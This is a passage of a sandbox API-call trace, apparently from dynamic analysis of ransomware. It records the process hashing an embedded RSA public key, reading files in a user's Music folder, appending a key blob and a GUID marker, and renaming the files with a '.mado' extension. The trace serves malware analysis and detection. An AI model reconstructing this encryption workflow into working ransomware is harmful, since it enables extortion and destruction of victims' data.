KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.296] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.296] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0204.297] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.297] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.297] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.298] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.298] GetLastError () returned 0x0 [0204.298] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.298] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0204.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.298] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.298] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.298] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x120c0) returned 0x3b80690 [0204.298] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e870 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe148 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e8b8 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe160 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe190 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1d8 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1a8 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b68078 [0204.299] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe190 | out: hHeap=0x2c0000) returned 1 [0204.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1a8 | out: hHeap=0x2c0000) returned 1 [0204.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1d8 | out: hHeap=0x2c0000) returned 1 [0204.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1d8 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe1a8 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe190 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bdb0 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bec8 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1a8 | out: hHeap=0x2c0000) returned 1 [0204.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe190 | out: hHeap=0x2c0000) returned 1 [0204.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1d8 | out: hHeap=0x2c0000) returned 1 [0204.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.300] GetCurrentThreadId () returned 0x600 [0204.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b71360 [0204.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0204.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.300] GetCurrentThreadId () returned 0x600 [0204.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1d8 [0204.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe190 [0204.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1a8 [0204.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe178 [0204.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1f0 [0204.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1c0 [0204.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe208 [0204.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe190 | out: hHeap=0x2c0000) returned 1 [0204.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe190 [0204.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1d8 | out: hHeap=0x2c0000) returned 1 [0204.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bdb0 [0204.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe208 | out: hHeap=0x2c0000) returned 1 [0204.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bb80 [0204.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bc98 [0204.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe190 | out: hHeap=0x2c0000) returned 1 [0204.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0204.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1c0 | out: hHeap=0x2c0000) returned 1 [0204.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1f0 | out: hHeap=0x2c0000) returned 1 [0204.303] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x120b8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.303] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.304] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.304] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.304] CloseHandle (hObject=0x63c) returned 1 [0204.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0204.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b74b68 [0204.305] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5VqYAySD2Zb-Kepu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\5vqyaysd2zb-kepu.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5VqYAySD2Zb-Kepu.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\5vqyaysd2zb-kepu.wav.mado")) returned 1 [0204.307] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cad5930, ftCreationTime.dwHighDateTime=0x1d5e524, ftLastAccessTime.dwLowDateTime=0xa1b0ff20, ftLastAccessTime.dwHighDateTime=0x1d5e530, ftLastWriteTime.dwLowDateTime=0xa1b0ff20, ftLastWriteTime.dwHighDateTime=0x1d5e530, nFileSizeHigh=0x0, nFileSizeLow=0x73f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6iJpD.mp3", cAlternateFileName="")) returned 1 [0204.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.307] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6iJpD.mp3") returned=".mp3" [0204.307] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6iJpD.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6ijpd.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.308] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=29687) returned 1 [0204.308] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.310] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x73d1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.310] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.312] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x73f7, lpOverlapped=0x0) returned 1 [0204.312] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.312] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.313] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.313] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.313] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.313] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.313] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.314] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.314] GetLastError () returned 0x0 [0204.314] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.314] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.314] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.314] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.314] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.314] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.314] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x73f7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.314] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.314] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 